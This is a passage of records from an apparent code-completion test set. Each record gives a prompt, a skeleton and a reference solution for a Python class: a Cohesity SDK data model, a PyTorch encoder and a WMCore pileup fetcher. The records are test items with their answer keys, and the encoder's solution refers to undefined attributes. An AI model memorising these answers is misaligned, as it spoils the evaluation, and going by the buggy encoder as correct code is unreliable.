num_physical_bytes_transferred, task_name, task_type)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000066", "length_bytes": 2796, "license_type": "permissive", "methods": [{"docstring": "Constructor for the DataTransferFromVaultPerTask class", "name": "__init__", "signature": "def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `DataTransferFromVaultPerTask` described below.\n\nClass description:\nImplementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.\n\nMethod signatures and docstrings:\n- def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None): Constructor for the DataTransferFromVaultPerTask class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `DataTransferFromVaultPerTask` described below.\n\nClass description:\nImplementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.\n\nMethod signatures and docstrings:\n- def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None): Constructor for the DataTransferFromVaultPerTask class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass DataTransferFromVaultPerTask:\n \"\"\"Implementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.\"\"\"\n\n def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None):\n \"\"\"Constructor for the DataTransferFromVaultPerTask class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.num_logical_bytes_transferred = num_logical_bytes_transferred\n self.num_physical_bytes_transferred = num_physical_bytes_transferred\n self.task_name = task_name\n self.task_type = task_type\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n num_logical_bytes_transferred = dictionary.get('numLogicalBytesTransferred')\n num_physical_bytes_transferred = dictionary.get('numPhysicalBytesTransferred')\n task_name = dictionary.get('taskName')\n task_type = dictionary.get('taskType')\n return cls(num_logical_bytes_transferred, num_physical_bytes_transferred, task_name, task_type)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass DataTransferFromVaultPerTask:\n \"\"\"Implementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.\"\"\"\n\n def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None):\n \"\"\"Constructor for the DataTransferFromVaultPerTask class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DataTransferFromVaultPerTask:\n \"\"\"Implementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.\"\"\"\n\n def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None):\n \"\"\"Constructor for the DataTransferFromVaultPerTask class\"\"\"\n self.num_logical_bytes_transferred = num_logical_bytes_transferred\n self.num_physical_bytes_transferred = num_physical_bytes_transferred\n self.task_name = task_name\n self.task_type = task_type\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n num_logical_bytes_transferred = dictionary.get('numLogicalBytesTransferred')\n num_physical_bytes_transferred = dictionary.get('numPhysicalBytesTransferred')\n task_name = dictionary.get('taskName')\n task_type = dictionary.get('taskType')\n return cls(num_logical_bytes_transferred, num_physical_bytes_transferred, task_name, task_type)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/data_transfer_from_vault_per_task.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "e027a9183c2c149dd94aeeaa48900e5a483960bd", "bodies": ["super().__init__()\nself._feature_dim = config[0]\nself._hidden_dim = config[1]\nself._output_dim = config[2]\nself._layer_count = config[3]\nself._layers = nn.ModuleList([])\nfor i in range(len(self._filter_sizes)):\n if i == 0:\n self._layers.append(nn.Linear(self._feature_dim, self._hidden_dim))\n if i == self._layer_count - 1:\n self._layers.append(nn.Linear(self._hidden_dim, self._output_dim))\n else:\n self._layers.append(nn.Linear(self._hidden_dim, self._hidden_dim))", "num_task, n_way, k_shot, feature_dim = inputs.shape\ninputs = inputs.view(-1, feature_dim)\nhidden = inputs\nfor i, layer in enumerate(self._layers):\n hidden = F.relu(layer(hidden))\nhidden = hidden.view(num_task, n_way, k_shot, -1)\nhidden = self._last_layer(hidden)\noutput_dim = hidden.size(-1)\nkl_loss = None\nreturn (hidden, kl_loss)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self._feature_dim = config[0]\n self._hidden_dim = config[1]\n self._output_dim = config[2]\n self._layer_count = config[3]\n self._layers = nn.ModuleList([])\n for i in range(len(self._filter_sizes)):\n if i == 0:\n self._layers.append(nn.Linear(self._feature_dim, self._hidden_dim))\n if i == self._layer_count - 1:\n self._layers.append(nn.Linear(self._hidden_dim, self._output_dim))\n else:\n self._layers.append(nn.Linear(self._hidden_dim, self._hidden_dim))\n<|end_body_0|>\n\n<|body_start_1|>\n num_task, n_way, k_shot, feature_dim = inputs.shape\n inputs = inputs.view(-1, feature_dim)\n hidden = inputs\n for i, layer in enumerate(self._layers):\n hidden = F.relu(layer(hidden))\n hidden = hidden.view(num_task, n_way, k_shot, -1)\n hidden = self._last_layer(hidden)\n output_dim = hidden.size(-1)\n kl_loss = None\n return (hidden, kl_loss)\n<|end_body_1|>\n", "class_docstring": "Deterministic_Conv_Encoder", "class_name": "Deterministic_FC_Encoder", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Deterministic_FC_Encoder:\n \"\"\"Deterministic_Conv_Encoder\"\"\"\n\n def __init__(self, config):\n \"\"\"NP\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self._feature_dim = config[0]\n self._hidden_dim = config[1]\n self._output_dim = config[2]\n self._layer_count = config[3]\n self._layers = nn.ModuleList([])\n for i in range(len(self._filter_sizes)):\n if i == 0:\n self._layers.append(nn.Linear(self._feature_dim, self._hidden_dim))\n if i == self._layer_count - 1:\n self._layers.append(nn.Linear(self._hidden_dim, self._output_dim))\n else:\n self._layers.append(nn.Linear(self._hidden_dim, self._hidden_dim))\n<|end_body_0|>\n\n<|body_start_1|>\n num_task, n_way, k_shot, feature_dim = inputs.shape\n inputs = inputs.view(-1, feature_dim)\n hidden = inputs\n for i, layer in enumerate(self._layers):\n hidden = F.relu(layer(hidden))\n hidden = hidden.view(num_task, n_way, k_shot, -1)\n hidden = self._last_layer(hidden)\n output_dim = hidden.size(-1)\n kl_loss = None\n return (hidden, kl_loss)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000067", "length_bytes": 18202, "license_type": "no_license", "methods": [{"docstring": "NP", "name": "__init__", "signature": "def __init__(self, config)"}, {"docstring": "Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :", "name": "forward", "signature": "def forward(self, inputs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000058", "prompt": "Implement the Python class `Deterministic_FC_Encoder` described below.\n\nClass description:\nDeterministic_Conv_Encoder\n\nMethod signatures and docstrings:\n- def __init__(self, config): NP\n- def forward(self, inputs): Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :", "prompted_full_text": "Implement the Python class `Deterministic_FC_Encoder` described below.\n\nClass description:\nDeterministic_Conv_Encoder\n\nMethod signatures and docstrings:\n- def __init__(self, config): NP\n- def forward(self, inputs): Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :\n\n<|skeleton|>\nclass Deterministic_FC_Encoder:\n \"\"\"Deterministic_Conv_Encoder\"\"\"\n\n def __init__(self, config):\n \"\"\"NP\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self._feature_dim = config[0]\n self._hidden_dim = config[1]\n self._output_dim = config[2]\n self._layer_count = config[3]\n self._layers = nn.ModuleList([])\n for i in range(len(self._filter_sizes)):\n if i == 0:\n self._layers.append(nn.Linear(self._feature_dim, self._hidden_dim))\n if i == self._layer_count - 1:\n self._layers.append(nn.Linear(self._hidden_dim, self._output_dim))\n else:\n self._layers.append(nn.Linear(self._hidden_dim, self._hidden_dim))\n<|end_body_0|>\n\n<|body_start_1|>\n num_task, n_way, k_shot, feature_dim = inputs.shape\n inputs = inputs.view(-1, feature_dim)\n hidden = inputs\n for i, layer in enumerate(self._layers):\n hidden = F.relu(layer(hidden))\n hidden = hidden.view(num_task, n_way, k_shot, -1)\n hidden = self._last_layer(hidden)\n output_dim = hidden.size(-1)\n kl_loss = None\n return (hidden, kl_loss)\n<|end_body_1|>\n", "revision_id": "c7e1bfb49ebaec6937ed7b186689227f95a43e0f", "skeleton": "<|skeleton|>\nclass Deterministic_FC_Encoder:\n \"\"\"Deterministic_Conv_Encoder\"\"\"\n\n def __init__(self, config):\n \"\"\"NP\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Deterministic_FC_Encoder:\n \"\"\"Deterministic_Conv_Encoder\"\"\"\n\n def __init__(self, config):\n \"\"\"NP\"\"\"\n super().__init__()\n self._feature_dim = config[0]\n self._hidden_dim = config[1]\n self._output_dim = config[2]\n self._layer_count = config[3]\n self._layers = nn.ModuleList([])\n for i in range(len(self._filter_sizes)):\n if i == 0:\n self._layers.append(nn.Linear(self._feature_dim, self._hidden_dim))\n if i == self._layer_count - 1:\n self._layers.append(nn.Linear(self._hidden_dim, self._output_dim))\n else:\n self._layers.append(nn.Linear(self._hidden_dim, self._hidden_dim))\n\n def forward(self, inputs):\n \"\"\"Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :\"\"\"\n num_task, n_way, k_shot, feature_dim = inputs.shape\n inputs = inputs.view(-1, feature_dim)\n hidden = inputs\n for i, layer in enumerate(self._layers):\n hidden = F.relu(layer(hidden))\n hidden = hidden.view(num_task, n_way, k_shot, -1)\n hidden = self._last_layer(hidden)\n output_dim = hidden.size(-1)\n kl_loss = None\n return (hidden, kl_loss)\n", "source": "the_stack_v2_python_sparse", "source_path": "model/MAML/Part/encoder.py", "source_repo": "MingyuKim87/MLwM", "split": "test", "star_events_count": 0} {"blob_id": "969ba5f67f272118480f3b605466b5c231e24391", "bodies": ["resultDict = {}\nfor pileupType in stepHelper.data.pileup.listSections_():\n datasets = getattr(getattr(stepHelper.data.pileup, pileupType), 'dataset')\n blockDict = {}\n for dataset in datasets:\n blockNames = dbsReader.listFileBlocks(dataset)\n for dbsBlockName in blockNames:\n blockDict[dbsBlockName] = {'FileList': dbsReader.lfnsInBlock(dbsBlockName), 'StorageElementNames': dbsReader.listFileBlockLocation(dbsBlockName)}\n resultDict[pileupType] = blockDict\nreturn resultDict", "encoder = JSONEncoder()\nurl = helper.data.dbsUrl\nfrom WMCore.Services.DBS.DBSReader import DBSReader\ndbsReader = DBSReader(url)\nconfigDict = self._queryDbsAndGetPileupConfig(helper, dbsReader)\njson = encoder.encode(configDict)\nstepPath = '%s/%s' % (self.workingDirectory(), helper.name())\nif not os.path.exists(stepPath):\n os.mkdir(stepPath)\ntry:\n fileName = '%s/%s' % (stepPath, 'pileupconf.json')\n f = open(fileName, 'w')\n f.write(json)\n f.close()\nexcept IOError:\n m = \"Could not save pileup JSON configuration file: '%s'\" % fileName\n raise RuntimeError(m)", "for step in wmTask.steps().nodeIterator():\n helper = WMStep.WMStepHelper(step)\n if hasattr(helper.data, 'pileup'):\n self._createPileupConfigFile(helper)"], "bodies_text": "<|body_start_0|>\n resultDict = {}\n for pileupType in stepHelper.data.pileup.listSections_():\n datasets = getattr(getattr(stepHelper.data.pileup, pileupType), 'dataset')\n blockDict = {}\n for dataset in datasets:\n blockNames = dbsReader.listFileBlocks(dataset)\n for dbsBlockName in blockNames:\n blockDict[dbsBlockName] = {'FileList': dbsReader.lfnsInBlock(dbsBlockName), 'StorageElementNames': dbsReader.listFileBlockLocation(dbsBlockName)}\n resultDict[pileupType] = blockDict\n return resultDict\n<|end_body_0|>\n\n<|body_start_1|>\n encoder = JSONEncoder()\n url = helper.data.dbsUrl\n from WMCore.Services.DBS.DBSReader import DBSReader\n dbsReader = DBSReader(url)\n configDict = self._queryDbsAndGetPileupConfig(helper, dbsReader)\n json = encoder.encode(configDict)\n stepPath = '%s/%s' % (self.workingDirectory(), helper.name())\n if not os.path.exists(stepPath):\n os.mkdir(stepPath)\n try:\n fileName = '%s/%s' % (stepPath, 'pileupconf.json')\n f = open(fileName, 'w')\n f.write(json)\n f.close()\n except IOError:\n m = \"Could not save pileup JSON configuration file: '%s'\" % fileName\n raise RuntimeError(m)\n<|end_body_1|>\n\n<|body_start_2|>\n for step in wmTask.steps().nodeIterator():\n helper = WMStep.WMStepHelper(step)\n if hasattr(helper.data, 'pileup'):\n self._createPileupConfigFile(helper)\n<|end_body_2|>\n", "class_docstring": "Pull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox", "class_name": "PileupFetcher", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PileupFetcher:\n \"\"\"Pull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\"\"\"\n\n def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader):\n \"\"\"Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\"\"\"\n <|body_0|>\n\n def _createPileupConfigFile(self, helper):\n \"\"\"Stores pileup JSON configuration file in the working directory / sandbox.\"\"\"\n <|body_1|>\n\n def __call__(self, wmTask):\n \"\"\"Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resultDict = {}\n for pileupType in stepHelper.data.pileup.listSections_():\n datasets = getattr(getattr(stepHelper.data.pileup, pileupType), 'dataset')\n blockDict = {}\n for dataset in datasets:\n blockNames = dbsReader.listFileBlocks(dataset)\n for dbsBlockName in blockNames:\n blockDict[dbsBlockName] = {'FileList': dbsReader.lfnsInBlock(dbsBlockName), 'StorageElementNames': dbsReader.listFileBlockLocation(dbsBlockName)}\n resultDict[pileupType] = blockDict\n return resultDict\n<|end_body_0|>\n\n<|body_start_1|>\n encoder = JSONEncoder()\n url = helper.data.dbsUrl\n from WMCore.Services.DBS.DBSReader import DBSReader\n dbsReader = DBSReader(url)\n configDict = self._queryDbsAndGetPileupConfig(helper, dbsReader)\n json = encoder.encode(configDict)\n stepPath = '%s/%s' % (self.workingDirectory(), helper.name())\n if not os.path.exists(stepPath):\n os.mkdir(stepPath)\n try:\n fileName = '%s/%s' % (stepPath, 'pileupconf.json')\n f = open(fileName, 'w')\n f.write(json)\n f.close()\n except IOError:\n m = \"Could not save pileup JSON configuration file: '%s'\" % fileName\n raise RuntimeError(m)\n<|end_body_1|>\n\n<|body_start_2|>\n for step in wmTask.steps().nodeIterator():\n helper = WMStep.WMStepHelper(step)\n if hasattr(helper.data, 'pileup'):\n self._createPileupConfigFile(helper)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000068", "length_bytes": 4412, "license_type": "no_license", "methods": [{"docstring": "Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi", "name": "_queryDbsAndGetPileupConfig", "signature": "def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader)"}, {"docstring": "Stores pileup JSON configuration file in the working directory / sandbox.", "name": "_createPileupConfigFile", "signature": "def _createPileupConfigFile(self, helper)"}, {"docstring": "Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper", "name": "__call__", "signature": "def __call__(self, wmTask)"}], "n_methods": 3, "prompt": "Implement the Python class `PileupFetcher` described below.\n\nClass description:\nPull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\n\nMethod signatures and docstrings:\n- def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader): Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\n- def _createPileupConfigFile(self, helper): Stores pileup JSON configuration file in the working directory / sandbox.\n- def __call__(self, wmTask): Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper", "prompted_full_text": "Implement the Python class `PileupFetcher` described below.\n\nClass description:\nPull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\n\nMethod signatures and docstrings:\n- def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader): Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\n- def _createPileupConfigFile(self, helper): Stores pileup JSON configuration file in the working directory / sandbox.\n- def __call__(self, wmTask): Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper\n\n<|skeleton|>\nclass PileupFetcher:\n \"\"\"Pull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\"\"\"\n\n def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader):\n \"\"\"Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\"\"\"\n <|body_0|>\n\n def _createPileupConfigFile(self, helper):\n \"\"\"Stores pileup JSON configuration file in the working directory / sandbox.\"\"\"\n <|body_1|>\n\n def __call__(self, wmTask):\n \"\"\"Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resultDict = {}\n for pileupType in stepHelper.data.pileup.listSections_():\n datasets = getattr(getattr(stepHelper.data.pileup, pileupType), 'dataset')\n blockDict = {}\n for dataset in datasets:\n blockNames = dbsReader.listFileBlocks(dataset)\n for dbsBlockName in blockNames:\n blockDict[dbsBlockName] = {'FileList': dbsReader.lfnsInBlock(dbsBlockName), 'StorageElementNames': dbsReader.listFileBlockLocation(dbsBlockName)}\n resultDict[pileupType] = blockDict\n return resultDict\n<|end_body_0|>\n\n<|body_start_1|>\n encoder = JSONEncoder()\n url = helper.data.dbsUrl\n from WMCore.Services.DBS.DBSReader import DBSReader\n dbsReader = DBSReader(url)\n configDict = self._queryDbsAndGetPileupConfig(helper, dbsReader)\n json = encoder.encode(configDict)\n stepPath = '%s/%s' % (self.workingDirectory(), helper.name())\n if not os.path.exists(stepPath):\n os.mkdir(stepPath)\n try:\n fileName = '%s/%s' % (stepPath, 'pileupconf.json')\n f = open(fileName, 'w')\n f.write(json)\n f.close()\n except IOError:\n m = \"Could not save pileup JSON configuration file: '%s'\" % fileName\n raise RuntimeError(m)\n<|end_body_1|>\n\n<|body_start_2|>\n for step in wmTask.steps().nodeIterator():\n helper = WMStep.WMStepHelper(step)\n if hasattr(helper.data, 'pileup'):\n self._createPileupConfigFile(helper)\n<|end_body_2|>\n", "revision_id": "122f9332f2e944154dd0df68b6b3f2875427b032", "skeleton": "<|skeleton|>\nclass PileupFetcher:\n \"\"\"Pull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\"\"\"\n\n def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader):\n \"\"\"Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\"\"\"\n <|body_0|>\n\n def _createPileupConfigFile(self, helper):\n \"\"\"Stores pileup JSON configuration file in the working directory / sandbox.\"\"\"\n <|body_1|>\n\n def __call__(self, wmTask):\n \"\"\"Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PileupFetcher:\n \"\"\"Pull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\"\"\"\n\n def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader):\n \"\"\"Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\"\"\"\n resultDict = {}\n for pileupType in stepHelper.data.pileup.listSections_():\n datasets = getattr(getattr(stepHelper.data.pileup, pileupType), 'dataset')\n blockDict = {}\n for dataset in datasets:\n blockNames = dbsReader.listFileBlocks(dataset)\n for dbsBlockName in blockNames:\n blockDict[dbsBlockName] = {'FileList': dbsReader.lfnsInBlock(dbsBlockName), 'StorageElementNames': dbsReader.listFileBlockLocation(dbsBlockName)}\n resultDict[pileupType] = blockDict\n return resultDict\n\n def _createPileupConfigFile(self, helper):\n \"\"\"Stores pileup JSON configuration file in the working directory / sandbox.\"\"\"\n encoder = JSONEncoder()\n url = helper.data.dbsUrl\n from WMCore.Services.DBS.DBSReader import DBSReader\n dbsReader = DBSReader(url)\n configDict = self._queryDbsAndGetPileupConfig(helper, dbsReader)\n json = encoder.encode(configDict)\n stepPath = '%s/%s' % (self.workingDirectory(), helper.name())\n if not os.path.exists(stepPath):\n os.mkdir(stepPath)\n try:\n fileName = '%s/%s' % (stepPath, 'pileupconf.json')\n f = open(fileName, 'w')\n f.write(json)\n f.close()\n except IOError:\n m = \"Could not save pileup JSON configuration file: '%s'\" % fileName\n raise RuntimeError(m)\n\n def __call__(self, wmTask):\n \"\"\"Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper\"\"\"\n for step in wmTask.steps().nodeIterator():\n helper = WMStep.WMStepHelper(step)\n if hasattr(helper.data, 'pileup'):\n self._createPileupConfigFile(helper)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/python/WMCore/WMSpec/Steps/Fetchers/PileupFetcher.py", "source_repo": "cinquo/WMCore", "split": "test", "star_events_count": 1} {"blob_id": "e8d632942b51977f54ed57e3b3dbe11fa8b4f67c", "bodies": ["def input_fn():\n return ({'age': tf.constant([1]), 'language': tf.SparseTensor(values=['english'], indices=[[0, 0]], shape=[1, 1])}, tf.constant([[1]]))\nlanguage = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)\nage = 